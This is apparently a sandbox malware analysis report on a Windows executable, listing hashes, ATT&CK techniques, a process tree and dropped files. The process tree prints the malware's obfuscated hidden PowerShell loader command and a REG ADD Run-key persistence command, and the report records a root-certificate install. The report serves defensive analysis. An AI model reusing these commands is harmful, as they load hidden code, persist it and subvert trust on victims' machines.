f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4

General

Target

f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4.exe
Size

1.2MB
MD5

a4c6a296a5b55a2858c0343d2c44490b
SHA1

01c57919f82cf0ec9683540735141302032ac070
SHA256

f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4
SHA512

0bd26eb1250c24b3b0ea5938c17d71dcf9b7467fc85588e8b13978e8d06aaa6e34dd276ebb67c4455e2a8db4458d487c8bde54c7a0cf4bed2e54a323194ef13f
SSDEEP

24576:PZbqxGFMhCGa7cQPHpk060aci6V20XH83oD1dEUu28KkzFu7biF8:RbqxGFMhCGa7cQkJciMvMXLFgbi2

Score

8^/10

discovery execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2900	powershell.exe

Loads dropped DLL 2 IoCs

pid	Process
2900	powershell.exe
2812	Skankemageren.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%sekundrfilens% -windowstyle minimized $Seismologue=(Get-ItemProperty -Path 'HKCU:\\Ceration48\\').Openheartedness0;%sekundrfilens% ($Seismologue)"	reg.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2900	powershell.exe
2812	Skankemageren.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2900 set thread context of 2812	2900	powershell.exe	34

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Skankemageren.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2416	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	Skankemageren.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Skankemageren.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2900	powershell.exe
2900	powershell.exe
2900	powershell.exe
2900	powershell.exe
2900	powershell.exe
2900	powershell.exe
2900	powershell.exe
2900	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2900	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2900	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2876 wrote to memory of 2900	2876	f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4.exe	30
PID 2876 wrote to memory of 2900	2876	f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4.exe	30
PID 2876 wrote to memory of 2900	2876	f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4.exe	30
PID 2876 wrote to memory of 2900	2876	f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4.exe	30
PID 2900 wrote to memory of 2812	2900	powershell.exe	34
PID 2900 wrote to memory of 2812	2900	powershell.exe	34
PID 2900 wrote to memory of 2812	2900	powershell.exe	34
PID 2900 wrote to memory of 2812	2900	powershell.exe	34
PID 2900 wrote to memory of 2812	2900	powershell.exe	34
PID 2900 wrote to memory of 2812	2900	powershell.exe	34
PID 2812 wrote to memory of 2052	2812	Skankemageren.exe	35
PID 2812 wrote to memory of 2052	2812	Skankemageren.exe	35
PID 2812 wrote to memory of 2052	2812	Skankemageren.exe	35
PID 2812 wrote to memory of 2052	2812	Skankemageren.exe	35
PID 2052 wrote to memory of 2416	2052	cmd.exe	37
PID 2052 wrote to memory of 2416	2052	cmd.exe	37
PID 2052 wrote to memory of 2416	2052	cmd.exe	37
PID 2052 wrote to memory of 2416	2052	cmd.exe	37

C:\Users\Admin\AppData\Local\Temp\f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4.exe
"C:\Users\Admin\AppData\Local\Temp\f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2876
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$galdens=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Labourhoods.Mas';$beboerhusene=$galdens.SubString(2416,3);.$beboerhusene($galdens)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Users\Admin\AppData\Local\Temp\Skankemageren.exe
    "C:\Users\Admin\AppData\Local\Temp\Skankemageren.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious use of WriteProcessMemory
    PID:2812
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%sekundrfilens% -windowstyle minimized $Seismologue=(Get-ItemProperty -Path 'HKCU:\Ceration48\').Openheartedness0;%sekundrfilens% ($Seismologue)"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2052
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%sekundrfilens% -windowstyle minimized $Seismologue=(Get-ItemProperty -Path 'HKCU:\Ceration48\').Openheartedness0;%sekundrfilens% ($Seismologue)"
        5⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

3

T1112

Subvert Trust Controls

1

T1553

Install Root Certificate

1

T1553.004

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Labourhoods.Mas

Filesize
51KB

MD5
edef981795fb6272025d069c64f98d9e

SHA1
665b7096bbd7c215bcf9c22e08e4148ae1eb7f9d

SHA256
f3b691cb8a7d661732bdd82f35cbe5cc2ed99fedc6992646803e871d221e9e37

SHA512
eff41508448d5949e79a3fa951006d28fe822364a72029f59e5f493cd9c59252dc02116c4777aeb5a2e389c075c43651e6198b713239f69f692c89aaa7ade583

Download Submit
C:\Users\Admin\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Monoerne.Ple

Filesize
342KB

MD5
b75ebbcb5d2f614b0a9e050c93cdb838

SHA1
0ca8fd75e51890798ae01761532627d46c89ddd5

SHA256
08ddca57d81a3aa14a1ec07e0beede85bfb8104014d67cc8a2332be5a091abcb

SHA512
76fb2fde501d5d89edf279796f0ae6ef8f88dd42e07e759614f49008a46639ad848df3db5acc4e9ebd2002a7e02b6303935871a0d66f351d293229ecb4ab5371

Download Submit
\Users\Admin\AppData\Local\Temp\Skankemageren.exe

Filesize
1.2MB

MD5
a4c6a296a5b55a2858c0343d2c44490b

SHA1
01c57919f82cf0ec9683540735141302032ac070

SHA256
f7f089f7f7753da939649fe98a4d274e44b837a61b72d022897858e1998cc7c4

SHA512
0bd26eb1250c24b3b0ea5938c17d71dcf9b7467fc85588e8b13978e8d06aaa6e34dd276ebb67c4455e2a8db4458d487c8bde54c7a0cf4bed2e54a323194ef13f

Download Submit
memory/2812-25-0x00000000004C0000-0x0000000001522000-memory.dmp

Filesize
16.4MB

Download
memory/2900-15-0x0000000074310000-0x00000000748BB000-memory.dmp

Filesize
5.7MB

Download
memory/2900-12-0x0000000074310000-0x00000000748BB000-memory.dmp

Filesize
5.7MB

Download
memory/2900-8-0x0000000074311000-0x0000000074312000-memory.dmp

Filesize
4KB

Download
memory/2900-11-0x0000000074310000-0x00000000748BB000-memory.dmp

Filesize
5.7MB

Download
memory/2900-17-0x0000000074310000-0x00000000748BB000-memory.dmp

Filesize
5.7MB

Download
memory/2900-18-0x0000000006850000-0x00000000094D3000-memory.dmp

Filesize
44.5MB

Download
memory/2900-19-0x0000000074310000-0x00000000748BB000-memory.dmp

Filesize
5.7MB

Download
memory/2900-10-0x0000000074310000-0x00000000748BB000-memory.dmp

Filesize
5.7MB

Download
memory/2900-9-0x0000000074310000-0x00000000748BB000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads